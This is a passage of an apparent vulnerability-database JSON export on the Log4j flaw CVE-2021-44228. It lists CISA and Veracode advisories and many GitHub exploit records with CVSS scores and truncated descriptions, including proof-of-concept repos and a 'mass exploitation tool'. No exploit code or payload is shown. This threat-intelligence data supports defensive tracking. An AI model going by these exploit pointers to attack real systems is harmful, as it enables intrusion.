"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "CISA:8367DA0C1A6F51FB2D817745BB204C48", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-12-09T06:30:46", "description": "log4j is vulnerable to remote code execution. The vulnerability exists due to a lack of sanitization of LDAP and other JNDI related endpoints allowing an attacker who can control log messages or log message parameters to inject and execute arbitrary code via remote LDAP servers when message lookup substitution is enabled. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:09:45", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T18:23:56", "id": "VERACODE:33244", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33244/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-01-09T20:21:06", "description": "# CVE-2021-44228-Advisories\nPlease open Issues to include an adv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:41:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T20:08:19", "id": "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T05:08:10", "description": "# Log4j Vulnerability - Proof-of-concept\n\nThis repo has the dock...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:50:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T02:11:16", "id": "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T03:10:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:51:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T18:03:52", "id": "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:17:49", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-06T04:11:07", "id": "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T23:56:09", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:19:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-27T20:57:52", "id": "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:58:13", "description": "# Log4Shell\n\n<div align=\"center\">\n<img src=\"https://miro.medium....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-08T12:19:32", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-07-08T21:09:12", "id": "F99D82FC-3BE5-5B6D-8FDC-0E5BF9C0CE58", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:10:53", "description": "# f-for-java\na project writ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T01:31:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T18:06:45", "id": "76F0B9E8-D173-5309-9826-5880F8B35043", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:49:11", "description": "# Log4j_checker.py (CVE-2021-44228)\n![poc_log4j](https://user-im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T18:35:16", "type": &